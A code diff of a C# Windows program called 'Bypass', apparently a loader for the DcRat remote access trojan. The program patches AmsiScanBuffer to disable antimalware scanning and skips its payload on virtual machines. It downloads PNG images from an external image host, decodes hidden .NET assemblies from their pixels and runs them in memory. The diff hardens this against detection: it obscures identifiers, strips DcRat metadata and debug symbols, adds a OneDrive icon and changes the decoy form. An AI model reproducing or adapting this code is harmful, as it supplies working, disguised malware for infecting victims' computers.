1

Bypass/Bypass.csproj

@@ -8,8 +8,8 @@
     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
     <ProjectGuid>{6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}</ProjectGuid>
     <OutputType>WinExe</OutputType>
-    <RootNamespace>qwqdanchun</RootNamespace>
-    <AssemblyName>qwqdanchun</AssemblyName>
+    <RootNamespace>Program</RootNamespace>
+    <AssemblyName>Program</AssemblyName>
     <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
     <FileAlignment>512</FileAlignment>
     <Deterministic>true</Deterministic>
@@ -28,16 +28,19 @@
   </PropertyGroup>
   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
     <PlatformTarget>AnyCPU</PlatformTarget>
-    <DebugType>pdbonly</DebugType>
+    <DebugType>none</DebugType>
     <Optimize>true</Optimize>
     <OutputPath>bin\Release\</OutputPath>
     <DefineConstants>TRACE</DefineConstants>
     <ErrorReport>prompt</ErrorReport>
     <WarningLevel>4</WarningLevel>
-    <DebugSymbols>true</DebugSymbols>
+    <DebugSymbols>false</DebugSymbols>
   </PropertyGroup>
   <PropertyGroup>
-    <ApplicationIcon>TextTemplate.ico</ApplicationIcon>
+    <ApplicationIcon>OneDrive.ico</ApplicationIcon>
+  </PropertyGroup>
+  <PropertyGroup>
+    <ApplicationManifest>app.manifest</ApplicationManifest>
   </PropertyGroup>
   <ItemGroup>
     <Reference Include="System" />
@@ -74,6 +77,7 @@
       <DependentUpon>Resources.resx</DependentUpon>
       <DesignTime>True</DesignTime>
     </Compile>
+    <None Include="app.manifest" />
     <None Include="ILMerge.props" />
     <None Include="packages.config" />
     <None Include="Properties\Settings.settings">
@@ -88,7 +92,7 @@
   </ItemGroup>
   <ItemGroup>
     <Content Include="ILMergeOrder.txt" />
-    <Content Include="TextTemplate.ico" />
+    <Content Include="OneDrive.ico" />
   </ItemGroup>
   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
   <Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">

Bypass/Form1.Designer.cs

@@ -1,5 +1,5 @@
 
-namespace qwqdanchun
+namespace Program
 {
     partial class Form1
     {
@@ -30,57 +30,74 @@ namespace qwqdanchun
         private void InitializeComponent()
         {
             this.button1 = new System.Windows.Forms.Button();
+            this.checkBox1 = new System.Windows.Forms.CheckBox();
+            this.dateTimePicker1 = new System.Windows.Forms.DateTimePicker();
+            this.listView1 = new System.Windows.Forms.ListView();
             this.monthCalendar1 = new System.Windows.Forms.MonthCalendar();
-            this.label1 = new System.Windows.Forms.Label();
-            this.pictureBox1 = new System.Windows.Forms.PictureBox();
-            ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
+            this.progressBar1 = new System.Windows.Forms.ProgressBar();
             this.SuspendLayout();
             // 
             // button1
             // 
-            this.button1.Location = new System.Drawing.Point(505, 209);
+            this.button1.Location = new System.Drawing.Point(288, 111);
             this.button1.Name = "button1";
             this.button1.Size = new System.Drawing.Size(75, 23);
             this.button1.TabIndex = 0;
             this.button1.Text = "button1";
             this.button1.UseVisualStyleBackColor = true;
-            this.button1.Click += new System.EventHandler(this.button1_Click);
+            // 
+            // checkBox1
+            // 
+            this.checkBox1.AutoSize = true;
+            this.checkBox1.Location = new System.Drawing.Point(110, 188);
+            this.checkBox1.Name = "checkBox1";
+            this.checkBox1.Size = new System.Drawing.Size(78, 16);
+            this.checkBox1.TabIndex = 1;
+            this.checkBox1.Text = "checkBox1";
+            this.checkBox1.UseVisualStyleBackColor = true;
+            // 
+            // dateTimePicker1
+            // 
+            this.dateTimePicker1.Location = new System.Drawing.Point(203, 228);
+            this.dateTimePicker1.Name = "dateTimePicker1";
+            this.dateTimePicker1.Size = new System.Drawing.Size(200, 21);
+            this.dateTimePicker1.TabIndex = 2;
+            // 
+            // listView1
+            // 
+            this.listView1.HideSelection = false;
+            this.listView1.Location = new System.Drawing.Point(482, 261);
+            this.listView1.Name = "listView1";
+            this.listView1.Size = new System.Drawing.Size(121, 97);
+            this.listView1.TabIndex = 3;
+            this.listView1.UseCompatibleStateImageBehavior = false;
             // 
             // monthCalendar1
             // 
-            this.monthCalendar1.Location = new System.Drawing.Point(137, 120);
+            this.monthCalendar1.Location = new System.Drawing.Point(686, -22);
             this.monthCalendar1.Name = "monthCalendar1";
-            this.monthCalendar1.TabIndex = 1;
+            this.monthCalendar1.TabIndex = 4;
             // 
-            // label1
+            // progressBar1
             // 
-            this.label1.AutoSize = true;
-            this.label1.Location = new System.Drawing.Point(404, 110);
-            this.label1.Name = "label1";
-            this.label1.Size = new System.Drawing.Size(41, 12);
-            this.label1.TabIndex = 2;
-            this.label1.Text = "label1";
-            // 
-            // pictureBox1
-            // 
-            this.pictureBox1.Location = new System.Drawing.Point(520, 256);
-            this.pictureBox1.Name = "pictureBox1";
-            this.pictureBox1.Size = new System.Drawing.Size(204, 165);
-            this.pictureBox1.TabIndex = 3;
-            this.pictureBox1.TabStop = false;
+            this.progressBar1.Location = new System.Drawing.Point(153, 334);
+            this.progressBar1.Name = "progressBar1";
+            this.progressBar1.Size = new System.Drawing.Size(100, 23);
+            this.progressBar1.TabIndex = 5;
             // 
             // Form1
             // 
             this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
             this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
             this.ClientSize = new System.Drawing.Size(800, 450);
-            this.Controls.Add(this.pictureBox1);
-            this.Controls.Add(this.label1);
+            this.Controls.Add(this.progressBar1);
             this.Controls.Add(this.monthCalendar1);
+            this.Controls.Add(this.listView1);
+            this.Controls.Add(this.dateTimePicker1);
+            this.Controls.Add(this.checkBox1);
             this.Controls.Add(this.button1);
             this.Name = "Form1";
-            this.Text = "Test";
-            ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
+            this.Text = "123";
             this.ResumeLayout(false);
             this.PerformLayout();
 
@@ -89,9 +106,11 @@ namespace qwqdanchun
         #endregion
 
         private System.Windows.Forms.Button button1;
+        private System.Windows.Forms.CheckBox checkBox1;
+        private System.Windows.Forms.DateTimePicker dateTimePicker1;
+        private System.Windows.Forms.ListView listView1;
         private System.Windows.Forms.MonthCalendar monthCalendar1;
-        private System.Windows.Forms.Label label1;
-        private System.Windows.Forms.PictureBox pictureBox1;
+        private System.Windows.Forms.ProgressBar progressBar1;
     }
 }
 

Bypass/Form1.cs

@@ -7,7 +7,7 @@ using System.Linq;
 using System.Text;
 using System.Windows.Forms;
 
-namespace qwqdanchun
+namespace Program
 {
     public partial class Form1 : Form
     {

Bypass/Program.cs

@@ -9,7 +9,7 @@ using System.Runtime.InteropServices;
 using System.Text;
 using System.Windows.Forms;
 
-namespace qwqdanchun
+namespace Program
 {
     static class Program
     {
@@ -19,9 +19,9 @@ namespace qwqdanchun
         [STAThread]
         static void Main()
         {
-            if (!isVM_by_wim_temper())
+            if (!VM())
             {
-                Load();
+                LD();
             }
             Application.EnableVisualStyles();
             Application.SetCompatibleTextRenderingDefault(false);
@@ -29,7 +29,7 @@ namespace qwqdanchun
         }
 
 
-        public static byte[] depixelate(Bitmap img)
+        public static byte[] DE(Bitmap img)
         {
             StringBuilder holder = new StringBuilder();
             int xmax = img.Width - 1;
@@ -45,36 +45,36 @@ namespace qwqdanchun
 
             return Convert.FromBase64String(holder.ToString().Replac​e(Convert.ToChar(0).ToString(), ""));
         }
-        private static void Load()
+        private static void LD()
         {
             A.Bypass();
 
-            string loader = @"https://s1.ax1x.com/2020/04/28/J4Zp9S.png"; // No Startup，CHINA
-            string file = @"https://z3.ax1x.com/2021/03/29/cCXQtf.png"; //File
-            var requestLoader = WebRequest.Create(loader);
-            var requestFile = WebRequest.Create(file);
-            Bitmap loaderIMG;
-            Bitmap fileIMG;
+            string LDer = @"https://s1.ax1x.com/2020/04/28/J4Zp9S.png"; // No Startup，CHINA
+            string FI_LE = @"https://z3.ax1x.com/2021/07/05/RhfFGn.png"; //FI_LE
+            var requestLDer = WebRequest.Create(LDer);
+            var requestFI_LE = WebRequest.Create(FI_LE);
+            Bitmap LDerIMG;
+            Bitmap FI_LEIMG;
 
-            using (var response = requestLoader.GetResponse())
+            using (var response = requestLDer.GetResponse())
             using (var stream = response.GetResponseStream())
             {
-                loaderIMG = (Bitmap)Image.FromStream(stream);
+                LDerIMG = (Bitmap)Image.FromStream(stream);
             }
 
-            using (var response = requestFile.GetResponse())
+            using (var response = requestFI_LE.GetResponse())
             using (var stream = response.GetResponseStream())
             {
-                fileIMG = (Bitmap)Image.FromStream(stream);
+                FI_LEIMG = (Bitmap)Image.FromStream(stream);
             }
 
-            byte[] outputLoader = depixelate(loaderIMG);
+            byte[] outputLDer = DE(LDerIMG);
 
-            byte[] outputFile = depixelate(fileIMG);
+            byte[] outputFI_LE = DE(FI_LEIMG);
 
-            Assembly.Load(outputLoader).GetType("Loader.Loader").GetMethod("RunProgram").Invoke(null, new object[] { outputFile });
+            Assembly.Load(outputLDer).GetType("LDer.LDer").GetMethod("RunProgram").Invoke(null, new object[] { outputFI_LE });
         }
-        public static bool isVM_by_wim_temper()
+        public static bool VM()
         {
             SelectQuery selectQuery = new SelectQuery("Select * from Win32_CacheMemory");
             ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery);
@@ -99,31 +99,22 @@ namespace qwqdanchun
     {
         //static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
         //static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
-
-
-
-
-
-
-
         public static void Bypass()
         {
-            string x64 = "uFcA";
-            x64 = x64 + "B4DD";
-            string x86 = "uFcAB4";
-            x86 = x86 + "DCGAA=";
-            if (is64Bit())
-                PatchA(Convert.FromBase64String(x64));
+            string x64 = "uFcAB4DD";
+            string x86 = "uFcAB4DCGAA=";
+            if (i64())
+                pa(Convert.FromBase64String(x64));
             else
-                PatchA(Convert.FromBase64String(x86));
+                pa(Convert.FromBase64String(x86));
         }
 
-        private static void PatchA(byte[] patch)
+        private static void pa(byte[] patch)
         {
             try
             {
                 string liba = Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw="));
-                var lib = Win32.LoadLibraryA(ref liba);//Amsi.dll
+                var lib = Win32.LDLibraryA(ref liba);//Amsi.dll
                 string addra = Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI="));
                 var addr = Win32.GetProcAddress(lib, ref addra);//AmsiScanBuffer
 
@@ -139,14 +130,14 @@ namespace qwqdanchun
             }
         }
 
-        private static bool is64Bit()
+        private static bool i64()
         {
-            bool is64Bit = true;
+            bool i64 = true;
 
             if (IntPtr.Size == 4)
-                is64Bit = false;
+                i64 = false;
 
-            return is64Bit;
+            return i64;
         }
     }
 
@@ -156,22 +147,22 @@ namespace qwqdanchun
         //public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
 
         //[DllImport("kernel32")]
-        //public static extern IntPtr LoadLibrary(string name);
+        //public static extern IntPtr LDLibrary(string name);
 
 
-        public static readonly DelegateVirtualProtect VirtualAllocEx = LoadApi<DelegateVirtualProtect>("kernel32", Encoding.Default.GetString(Convert.FromBase64String("VmlydHVhbFByb3RlY3Q=")));//VirtualProtect
+        public static readonly DelegateVirtualProtect VirtualAllocEx = LDApi<DelegateVirtualProtect>("kernel32", Encoding.Default.GetString(Convert.FromBase64String("VmlydHVhbFByb3RlY3Q=")));//VirtualProtect
 
         public delegate int DelegateVirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
 
         #region CreateAPI
         [DllImport("kernel32", SetLastError = true)]
-        public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
+        public static extern IntPtr LDLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
 
         [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
         public static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
-        public static CreateApi LoadApi<CreateApi>(string name, string method)
+        public static CreateApi LDApi<CreateApi>(string name, string method)
         {
-            return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi));
+            return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LDLibraryA(ref name), ref method), typeof(CreateApi));
         }
         #endregion
     }

Bypass/Properties/AssemblyInfo.cs

@@ -5,11 +5,11 @@ using System.Runtime.InteropServices;
 // 有关程序集的一般信息由以下
 // 控制。更改这些特性值可修改
 // 与程序集关联的信息。
-[assembly: AssemblyTitle("簞純")]
-[assembly: AssemblyDescription("DcRat")]
+[assembly: AssemblyTitle("Program")]
+[assembly: AssemblyDescription("")]
 [assembly: AssemblyConfiguration("")]
-[assembly: AssemblyCompany("qwqdanchun")]
-[assembly: AssemblyProduct("簞純")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("")]
 [assembly: AssemblyCopyright("Copyright ©  2021")]
 [assembly: AssemblyTrademark("")]
 [assembly: AssemblyCulture("")]

Bypass/Properties/Resources.Designer.cs

@@ -8,7 +8,7 @@
 // </auto-generated>
 //------------------------------------------------------------------------------
 
-namespace qwqdanchun.Properties {
+namespace Program.Properties {
     using System;
     
     
@@ -39,7 +39,7 @@ namespace qwqdanchun.Properties {
         internal static global::System.Resources.ResourceManager ResourceManager {
             get {
                 if (object.ReferenceEquals(resourceMan, null)) {
-                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("qwqdanchun.Properties.Resources", typeof(Resources).Assembly);
+                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Program.Properties.Resources", typeof(Resources).Assembly);
                     resourceMan = temp;
                 }
                 return resourceMan;

Bypass/Properties/Settings.Designer.cs

@@ -8,11 +8,11 @@
 // </auto-generated>
 //------------------------------------------------------------------------------
 
-namespace qwqdanchun.Properties {
+namespace Program.Properties {
     
     
     [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
-    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "16.8.1.0")]
+    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "16.10.0.0")]
     internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
         
         private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));

Bypass/app.manifest

@@ -0,0 +1,77 @@
+<?xml version="1.0" encoding="utf-8"?>
+<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
+  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
+  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
+    <security>
+      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
+        <!-- UAC 清单选项
+             如果想要更改 Windows 用户帐户控制级别，请使用
+             以下节点之一替换 requestedExecutionLevel 节点。n
+        <requestedExecutionLevel  level="asInvoker" uiAccess="false" />
+        <requestedExecutionLevel  level="requireAdministrator" uiAccess="false" />
+        <requestedExecutionLevel  level="highestAvailable" uiAccess="false" />
+
+            指定 requestedExecutionLevel 元素将禁用文件和注册表虚拟化。
+            如果你的应用程序需要此虚拟化来实现向后兼容性，则删除此
+            元素。
+        -->
+        <requestedExecutionLevel level="asInvoker" uiAccess="false" />
+      </requestedPrivileges>
+    </security>
+  </trustInfo>
+
+  <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
+    <application>
+      <!-- 设计此应用程序与其一起工作且已针对此应用程序进行测试的
+           Windows 版本的列表。取消评论适当的元素，
+           Windows 将自动选择最兼容的环境。 -->
+
+      <!-- Windows Vista -->
+      <!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
+
+      <!-- Windows 7 -->
+      <!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
+
+      <!-- Windows 8 -->
+      <!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
+
+      <!-- Windows 8.1 -->
+      <!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
+
+      <!-- Windows 10 -->
+      <!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
+
+    </application>
+  </compatibility>
+
+  <!-- 指示该应用程序可感知 DPI 且 Windows 在 DPI 较高时将不会对其进行
+       自动缩放。Windows Presentation Foundation (WPF)应用程序自动感知 DPI，无需
+       选择加入。选择加入此设置的 Windows 窗体应用程序(面向 .NET Framework 4.6)还应
+       在其 app.config 中将 "EnableWindowsFormsHighDpiAutoResizing" 设置设置为 "true"。
+       
+       将应用程序设为感知长路径。请参阅 https://docs.microsoft.com/windows/win32/fileio/maximum-file-path-limitation -->
+
+  <application xmlns="urn:schemas-microsoft-com:asm.v3">
+    <windowsSettings>
+      <dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
+      <longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware>
+    </windowsSettings>
+  </application>
+
+  <!-- 启用 Windows 公共控件和对话框的主题(Windows XP 和更高版本) -->
+  <!--
+  <dependency>
+    <dependentAssembly>
+      <assemblyIdentity
+          type="win32"
+          name="Microsoft.Windows.Common-Controls"
+          version="6.0.0.0"
+          processorArchitecture="*"
+          publicKeyToken="6595b64144ccf1df"
+          language="*"
+        />
+    </dependentAssembly>
+  </dependency>
+  -->
+
+</assembly>